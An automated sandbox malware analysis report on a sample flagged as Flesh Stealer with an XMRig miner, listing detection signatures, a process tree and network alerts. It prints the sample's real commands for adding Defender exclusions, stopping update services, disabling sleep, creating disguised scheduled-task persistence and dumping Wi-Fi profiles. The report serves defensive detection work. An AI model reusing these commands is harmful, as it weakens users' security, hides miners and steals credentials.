Edit tour

Windows Analysis Report
zufmUwylvo.exe

Overview

General Information

Sample name:	zufmUwylvo.exe
Analysis ID:	1530000
MD5:	c526cb2c72a976831c06fc09991e20d8
SHA1:	b719c9c64a5368abf2671a0e8d6ef8902bdaf9aa
SHA256:	53ad8953df55fbe65065f3e94135a4596f6209f20947c0e3df949910ce6cbbc6
Infos:

Detection

Flesh Stealer, Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Sigma detected: Stop multiple services

Suricata IDS alerts for network traffic

Yara detected Flesh Stealer

Yara detected Xmrig cryptocurrency miner

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Found many strings related to Crypto-Wallets (likely being stolen)

Hooks files or directories query functions (used to hide files and directories)

Hooks processes query functions (used to hide processes)

Hooks registry keys query functions (used to hide registry keys)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies power options to not sleep / hibernate

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

PE file contains section with special chars

Performs DNS queries to domains with low reputation

Protects its processes via BreakOnTermination flag

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample is not signed and drops a device driver

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Stops critical windows services

Suspicious powershell command line found

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Uses netsh to modify the Windows network and firewall settings

Uses powercfg.exe to modify the power settings

Writes to foreign memory regions

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

HTTP GET or POST without a user agent

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the product ID of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Uncommon Svchost Parent Process

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64native

zufmUwylvo.exe (PID: 4540 cmdline: "C:\Users\user\Desktop\zufmUwylvo.exe" MD5: C526CB2C72A976831C06FC09991E20D8)

zxcvbnmasd.exe (PID: 6672 cmdline: "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe" MD5: 413E4E7BC129E8165D1FFD2B1AE5DB04)

dialer.exe (PID: 8464 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)

winlogon.exe (PID: 852 cmdline: winlogon.exe MD5: A987B43E6A8E8F894B98A3DF022DB518)

lsass.exe (PID: 908 cmdline: C:\Windows\system32\lsass.exe MD5: 15A556DEF233F112D127025AB51AC2D3)

WmiPrvSE.exe (PID: 4344 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

svchost.exe (PID: 1080 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: F586835082F632DC8D9404D83BC16316)

dwm.exe (PID: 1152 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)

svchost.exe (PID: 1284 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: F586835082F632DC8D9404D83BC16316)

updater.exe (PID: 8404 cmdline: "C:\Program Files\Google\Chrome\updater.exe" MD5: 413E4E7BC129E8165D1FFD2B1AE5DB04)

svchost.exe (PID: 1316 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: F586835082F632DC8D9404D83BC16316)

svchost.exe (PID: 1324 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: F586835082F632DC8D9404D83BC16316)

svchost.exe (PID: 1380 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: F586835082F632DC8D9404D83BC16316)

IntelCpHDCPSvc.exe (PID: 1440 cmdline: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe MD5: B6BAD2BD8596D9101874E9042B8E2D63)

svchost.exe (PID: 1452 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: F586835082F632DC8D9404D83BC16316)

svchost.exe (PID: 1472 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: F586835082F632DC8D9404D83BC16316)

svchost.exe (PID: 1568 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: F586835082F632DC8D9404D83BC16316)

svchost.exe (PID: 1688 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: F586835082F632DC8D9404D83BC16316)

IntelCpHeciSvc.exe (PID: 1748 cmdline: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe MD5: 3B0DF35583675DE5A08E8D4C1271CEC0)

igfxCUIService.exe (PID: 1808 cmdline: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe MD5: 91038D45A86B5465E8B7E5CD63187150)

svchost.exe (PID: 1848 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: F586835082F632DC8D9404D83BC16316)

svchost.exe (PID: 1920 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: F586835082F632DC8D9404D83BC16316)

cmd.exe (PID: 3592 cmdline: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

chcp.com (PID: 988 cmdline: chcp 65001 MD5: CA9A549C17932F9CAA154B5528EBD8D4)

netsh.exe (PID: 6476 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

findstr.exe (PID: 4808 cmdline: findstr All MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

powershell.exe (PID: 7544 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 8248 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 8304 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 8320 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 8336 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 8376 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 8396 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 8420 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powercfg.exe (PID: 8488 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 8596 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 8664 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 8724 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powershell.exe (PID: 8508 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 8704 cmdline: C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

choice.exe (PID: 8428 cmdline: choice /C Y /N /D Y /T 3 MD5: 1A9804F0C374283B094E9E55DC5EE128)

powershell.exe (PID: 8968 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 8136 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 9188 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 5672 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 8076 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 8148 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Windows\Temp\jscseoeoqftm.tmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\Windows\Temp\jscseoeoqftm.tmp	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d17a0:$s1: %s/%s (Windows NT %lu.%lu 0x4d1fc8:$s3: \\.\WinRing0_ 0x4ca4c8:$s4: pool_wallet 0x4c62d0:$s5: cryptonight 0x4c62e0:$s5: cryptonight 0x4c62f0:$s5: cryptonight 0x4c6300:$s5: cryptonight 0x4c6318:$s5: cryptonight 0x4c6328:$s5: cryptonight 0x4c6338:$s5: cryptonight 0x4c6350:$s5: cryptonight 0x4c6360:$s5: cryptonight 0x4c6378:$s5: cryptonight 0x4c6390:$s5: cryptonight 0x4c63a0:$s5: cryptonight 0x4c63b0:$s5: cryptonight 0x4c63c0:$s5: cryptonight 0x4c63d8:$s5: cryptonight 0x4c63f0:$s5: cryptonight 0x4c6400:$s5: cryptonight 0x4c6410:$s5: cryptonight
C:\Windows\Temp\jscseoeoqftm.tmp	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4d1241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
C:\Windows\Temp\jscseoeoqftm.tmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4cb268:$a1: mining.set_target 0x4c6a48:$a2: XMRIG_HOSTNAME 0x4c8540:$a3: Usage: xmrig [OPTIONS] 0x4c6a20:$a4: XMRIG_VERSION

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: zufmUwylvo.exe PID: 4540	JoeSecurity_FleshStealer	Yara detected Flesh Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
37.2.updater.exe.140040c40.6.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
37.2.updater.exe.140040c40.6.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4f6ca0:$s1: %s/%s (Windows NT %lu.%lu 0x4f74c8:$s3: \\.\WinRing0_ 0x4ef9c8:$s4: pool_wallet 0x4eb7d0:$s5: cryptonight 0x4eb7e0:$s5: cryptonight 0x4eb7f0:$s5: cryptonight 0x4eb800:$s5: cryptonight 0x4eb818:$s5: cryptonight 0x4eb828:$s5: cryptonight 0x4eb838:$s5: cryptonight 0x4eb850:$s5: cryptonight 0x4eb860:$s5: cryptonight 0x4eb878:$s5: cryptonight 0x4eb890:$s5: cryptonight 0x4eb8a0:$s5: cryptonight 0x4eb8b0:$s5: cryptonight 0x4eb8c0:$s5: cryptonight 0x4eb8d8:$s5: cryptonight 0x4eb8f0:$s5: cryptonight 0x4eb900:$s5: cryptonight 0x4eb910:$s5: cryptonight
37.2.updater.exe.140040c40.6.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4f6741:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
37.2.updater.exe.140040c40.6.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4f0768:$a1: mining.set_target 0x4ebf48:$a2: XMRIG_HOSTNAME 0x4eda40:$a3: Usage: xmrig [OPTIONS] 0x4ebf20:$a4: XMRIG_VERSION
37.2.updater.exe.14001fa80.7.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
37.2.updater.exe.14001fa80.7.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x517e60:$s1: %s/%s (Windows NT %lu.%lu 0x518688:$s3: \\.\WinRing0_ 0x510b88:$s4: pool_wallet 0x50c990:$s5: cryptonight 0x50c9a0:$s5: cryptonight 0x50c9b0:$s5: cryptonight 0x50c9c0:$s5: cryptonight 0x50c9d8:$s5: cryptonight 0x50c9e8:$s5: cryptonight 0x50c9f8:$s5: cryptonight 0x50ca10:$s5: cryptonight 0x50ca20:$s5: cryptonight 0x50ca38:$s5: cryptonight 0x50ca50:$s5: cryptonight 0x50ca60:$s5: cryptonight 0x50ca70:$s5: cryptonight 0x50ca80:$s5: cryptonight 0x50ca98:$s5: cryptonight 0x50cab0:$s5: cryptonight 0x50cac0:$s5: cryptonight 0x50cad0:$s5: cryptonight
37.2.updater.exe.14001fa80.7.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x517901:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
37.2.updater.exe.14001fa80.7.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x511928:$a1: mining.set_target 0x50d108:$a2: XMRIG_HOSTNAME 0x50ec00:$a3: Usage: xmrig [OPTIONS] 0x50d0e0:$a4: XMRIG_VERSION
37.2.updater.exe.140062860.5.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
37.2.updater.exe.140062860.5.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d5080:$s1: %s/%s (Windows NT %lu.%lu 0x4d58a8:$s3: \\.\WinRing0_ 0x4cdda8:$s4: pool_wallet 0x4c9bb0:$s5: cryptonight 0x4c9bc0:$s5: cryptonight 0x4c9bd0:$s5: cryptonight 0x4c9be0:$s5: cryptonight 0x4c9bf8:$s5: cryptonight 0x4c9c08:$s5: cryptonight 0x4c9c18:$s5: cryptonight 0x4c9c30:$s5: cryptonight 0x4c9c40:$s5: cryptonight 0x4c9c58:$s5: cryptonight 0x4c9c70:$s5: cryptonight 0x4c9c80:$s5: cryptonight 0x4c9c90:$s5: cryptonight 0x4c9ca0:$s5: cryptonight 0x4c9cb8:$s5: cryptonight 0x4c9cd0:$s5: cryptonight 0x4c9ce0:$s5: cryptonight 0x4c9cf0:$s5: cryptonight
37.2.updater.exe.140062860.5.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4d4b21:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
37.2.updater.exe.140062860.5.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4ceb48:$a1: mining.set_target 0x4ca328:$a2: XMRIG_HOSTNAME 0x4cbe20:$a3: Usage: xmrig [OPTIONS] 0x4ca300:$a4: XMRIG_VERSION
Click to see the 7 entries

Sigma Signatures

Operating System Destruction

Sigma detected: Stop multiple services

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5028, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, ProcessId: 8248, ProcessName: cmd.exe

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, ProcessId: 8508, ProcessName: powershell.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7544, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 8464, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 1080, ProcessName: svchost.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7544, ProcessName: powershell.exe

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\zufmUwylvo.exe", ParentImage: C:\Users\user\Desktop\zufmUwylvo.exe, ParentProcessId: 4540, ParentProcessName: zufmUwylvo.exe, ProcessCommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, ProcessId: 3592, ProcessName: cmd.exe

Suricata Signatures

ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-09T16:30:15.039753+0200	2036289	2	Crypto Currency Mining Activity Detected	192.168.11.30	54743	1.1.1.1	53	UDP

ET MALWARE SilentCryptoMiner Agent Config Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-09T16:30:17.283464+0200	2054247	1	A Network Trojan was detected	104.20.3.235	443	192.168.11.30	49779	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\jscseoeoqftm.tmp

Avira: detection malicious, Label: HEUR/AGEN.1362795

Multi AV Scanner detection for dropped file

Source: C:\Program Files\Google\Chrome\updater.exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\jscseoeoqftm.tmp	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	ReversingLabs: Detection: 28%
Source: C:\Windows\Temp\jscseoeoqftm.tmp	ReversingLabs: Detection: 70%

Multi AV Scanner detection for submitted file

Source: zufmUwylvo.exe

ReversingLabs: Detection: 68%

Machine Learning detection for dropped file

Source: C:\Windows\Temp\jscseoeoqftm.tmp	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\jscseoeoqftm.tmp	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: zufmUwylvo.exe

Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: 37.2.updater.exe.140040c40.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.updater.exe.14001fa80.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.updater.exe.140062860.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Windows\Temp\jscseoeoqftm.tmp, type: DROPPED

Source: C:\Program Files\Google\Chrome\updater.exe

Directory created: C:\Program Files\Google\Libs

Source: unknown

HTTPS traffic detected: 84.32.84.151:443 -> 192.168.11.30:49775 version: TLS 1.2

Source: zufmUwylvo.exe

